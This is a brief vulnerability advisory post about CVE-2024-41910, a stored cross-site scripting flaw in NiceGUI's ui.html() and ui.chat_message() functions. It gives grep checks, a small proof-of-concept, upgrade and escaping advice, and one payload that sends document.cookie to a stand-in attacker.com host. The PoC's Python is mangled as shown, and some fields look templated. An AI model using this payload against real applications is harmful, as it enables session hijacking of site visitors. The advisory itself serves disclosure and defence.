NiceGUI, Cross-Site Scripting, CVE-2024-41910 (Medium)

By /

Listen to this Post

How the CVE Works

The vulnerability CVE-2024-41910 is a Stored Cross-Site Scripting (XSS) flaw in the NiceGUI framework. It originates from the `ui.html()` and `ui.chat_message()` functions, which directly inject user-supplied data into the Document Object Model (DOM) without proper sanitization. When an application uses these functions to render input from a source like ui.input(), any malicious JavaScript code within that input is persisted and then executed in the browser of any user who views the compromised page. The attack payload is stored on the server and served to victims, allowing for persistent client-side code execution, such as stealing session cookies or performing actions on behalf of the user, because the framework does not escape HTML content before passing it to the browser’s `innerHTML` property.

dailycve form:

Platform: NiceGUI
Version: < 3.0.0
Vulnerability: Stored XSS
Severity: Medium

date: 2024-08-28

Prediction: Patch available

What Undercode Say:

Searching for vulnerable code patterns with grep
grep -r "ui.html(f'.{.}')" /app/
grep -r "ui.chat_message" /app/ | grep "html=True"

Proof-of-Concept exploit code
from nicegui import ui
@ui.page('/')
def exploit():
ui.input('Name', on_change=lambda e: ui.html(e.value))
Payload: <script>fetch('https://attacker.com/?c='+document.cookie)</script>

How Exploit:

Attacker inputs a malicious script payload into a field rendered by ui.html(). The payload is saved and executed automatically in every visitor’s browser, hijacking sessions or defacing the application.

Protection from this CVE

Upgrade to NiceGUI version 3.0.0 or later. Manually sanitize all user input before passing it to `ui.html()` using libraries like html.escape(). Avoid rendering untrusted user data with `ui.html()` or ui.chat_message(html=True).

Impact:

Session hijacking, phishing attacks, arbitrary client-side action execution, and application compromise for all users viewing the malicious content.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top